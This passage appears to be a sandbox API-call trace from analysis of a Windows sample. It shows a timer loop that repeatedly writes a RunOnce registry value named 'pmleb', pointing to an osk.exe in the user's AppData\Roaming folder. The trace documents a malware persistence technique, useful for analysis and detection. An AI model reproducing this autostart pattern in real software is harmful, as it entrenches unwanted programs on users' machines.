lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.317] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.317] RegCloseKey (hKey=0x280) returned 0x0 [0109.317] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.318] SetTimer (hWnd=0x20280, nIDEvent=0x245c, uElapse=0xa, lpTimerFunc=0x0) returned 0x245c [0109.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.331] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.331] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.331] KillTimer (hWnd=0x20280, uIDEvent=0x245c) returned 1 [0109.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.332] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.332] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.332] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.332] RegCloseKey (hKey=0x280) returned 0x0 [0109.332] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.333] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0109.333] SetTimer (hWnd=0x20280, nIDEvent=0x245d, uElapse=0xa, lpTimerFunc=0x0) returned 0x245d [0109.333] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.346] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.346] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.347] KillTimer (hWnd=0x20280, uIDEvent=0x245d) returned 1 [0109.347] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.347] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.347] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.347] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.348] RegCloseKey (hKey=0x280) returned 0x0 [0109.348] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.348] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.348] SetTimer (hWnd=0x20280, nIDEvent=0x245e, uElapse=0xa, lpTimerFunc=0x0) returned 0x245e [0109.348] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.362] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.362] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.362] KillTimer (hWnd=0x20280, uIDEvent=0x245e) returned 1 [0109.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.363] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.363] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.363] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.363] RegCloseKey (hKey=0x280) returned 0x0 [0109.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.364] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.364] SetTimer (hWnd=0x20280, nIDEvent=0x245f, uElapse=0xa, lpTimerFunc=0x0) returned 0x245f [0109.364] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.377] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.377] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.378] KillTimer (hWnd=0x20280, uIDEvent=0x245f) returned 1 [0109.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.379] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.379] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.379] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.380] RegCloseKey (hKey=0x280) returned 0x0 [0109.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.380] SetTimer (hWnd=0x20280, nIDEvent=0x2460, uElapse=0xa, lpTimerFunc=0x0) returned 0x2460 
[0109.380] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.393] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.393] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.393] KillTimer (hWnd=0x20280, uIDEvent=0x2460) returned 1 [0109.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.394] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.394] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.394] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.394] RegCloseKey (hKey=0x280) returned 0x0 [0109.394] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.394] SetTimer (hWnd=0x20280, nIDEvent=0x2461, uElapse=0xa, lpTimerFunc=0x0) returned 0x2461 [0109.394] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.415] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.415] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.415] KillTimer (hWnd=0x20280, uIDEvent=0x2461) returned 1 [0109.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.416] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.416] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.416] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.417] RegCloseKey (hKey=0x280) returned 0x0 [0109.417] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.417] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.417] SetTimer (hWnd=0x20280, nIDEvent=0x2462, uElapse=0xa, lpTimerFunc=0x0) returned 0x2462 [0109.417] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.424] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.424] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.424] KillTimer (hWnd=0x20280, uIDEvent=0x2462) returned 1 [0109.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.425] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.425] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.425] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.425] RegCloseKey (hKey=0x280) returned 0x0 [0109.425] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.425] SetTimer (hWnd=0x20280, nIDEvent=0x2463, uElapse=0xa, lpTimerFunc=0x0) returned 0x2463 [0109.425] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0109.440] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.440] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.440] KillTimer (hWnd=0x20280, uIDEvent=0x2463) returned 1 [0109.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.441] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.441] RegCloseKey (hKey=0x280) returned 0x0 [0109.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.441] SetTimer (hWnd=0x20280, nIDEvent=0x2464, uElapse=0xa, lpTimerFunc=0x0) returned 0x2464 [0109.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.455] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.456] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.456] KillTimer (hWnd=0x20280, uIDEvent=0x2464) returned 1 [0109.456] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.456] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.456] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.457] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.457] RegCloseKey (hKey=0x280) returned 0x0 [0109.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.457] SetTimer (hWnd=0x20280, nIDEvent=0x2465, uElapse=0xa, lpTimerFunc=0x0) returned 0x2465 [0109.457] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.471] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.471] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.471] KillTimer (hWnd=0x20280, uIDEvent=0x2465) returned 1 [0109.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.472] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.472] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.472] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.472] RegCloseKey (hKey=0x280) returned 0x0 [0109.472] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.472] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.472] SetTimer (hWnd=0x20280, nIDEvent=0x2466, uElapse=0xa, lpTimerFunc=0x0) returned 0x2466 [0109.473] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.486] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.486] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.487] KillTimer (hWnd=0x20280, uIDEvent=0x2466) returned 1 [0109.487] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.488] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.488] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.488] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.488] RegCloseKey (hKey=0x280) returned 0x0 [0109.488] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.489] SetTimer (hWnd=0x20280, nIDEvent=0x2467, uElapse=0xa, lpTimerFunc=0x0) returned 0x2467 [0109.489] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.198] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.198] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.199] KillTimer (hWnd=0x20280, uIDEvent=0x2467) returned 1 [0110.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.200] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.200] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.200] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.200] RegCloseKey (hKey=0x280) returned 0x0 [0110.200] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.200] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.200] SetTimer (hWnd=0x20280, nIDEvent=0x2468, uElapse=0xa, lpTimerFunc=0x0) returned 0x2468 [0110.200] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.204] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.204] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.204] KillTimer (hWnd=0x20280, uIDEvent=0x2468) returned 1 [0110.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.205] RegCloseKey (hKey=0x280) returned 0x0 [0110.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.206] SetTimer (hWnd=0x20280, nIDEvent=0x2469, uElapse=0xa, lpTimerFunc=0x0) returned 0x2469 [0110.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.220] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.220] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.220] KillTimer (hWnd=0x20280, 
uIDEvent=0x2469) returned 1 [0110.220] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.221] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.221] RegCloseKey (hKey=0x280) returned 0x0 [0110.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.221] SetTimer (hWnd=0x20280, nIDEvent=0x246a, uElapse=0xa, lpTimerFunc=0x0) returned 0x246a [0110.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.235] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.235] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.235] KillTimer (hWnd=0x20280, uIDEvent=0x246a) returned 1 [0110.236] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.236] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.236] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.236] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.237] RegCloseKey (hKey=0x280) returned 0x0 [0110.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.237] SetTimer (hWnd=0x20280, nIDEvent=0x246b, uElapse=0xa, lpTimerFunc=0x0) returned 0x246b [0110.237] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.251] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.251] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.251] KillTimer (hWnd=0x20280, uIDEvent=0x246b) returned 1 [0110.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.251] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.252] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.252] RegCloseKey (hKey=0x280) returned 0x0 [0110.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.252] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.252] SetTimer (hWnd=0x20280, nIDEvent=0x246c, uElapse=0xa, lpTimerFunc=0x0) returned 0x246c [0110.252] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.266] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.266] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.267] KillTimer (hWnd=0x20280, uIDEvent=0x246c) returned 1 [0110.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0110.267] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.268] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.268] RegCloseKey (hKey=0x280) returned 0x0 [0110.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0110.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.268] SetTimer (hWnd=0x20280, nIDEvent=0x246d, uElapse=0xa, lpTimerFunc=0x0) returned 0x246d [0110.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0110.282] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0110.282] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0110.282] KillTimer (hWnd=0x20280, uIDEvent=0x246d) returned 1 [0110.282] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0110.283] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0110.283] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0110.283] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0110.283] RegCloseKey (hKey=0x280) returned 0x0 
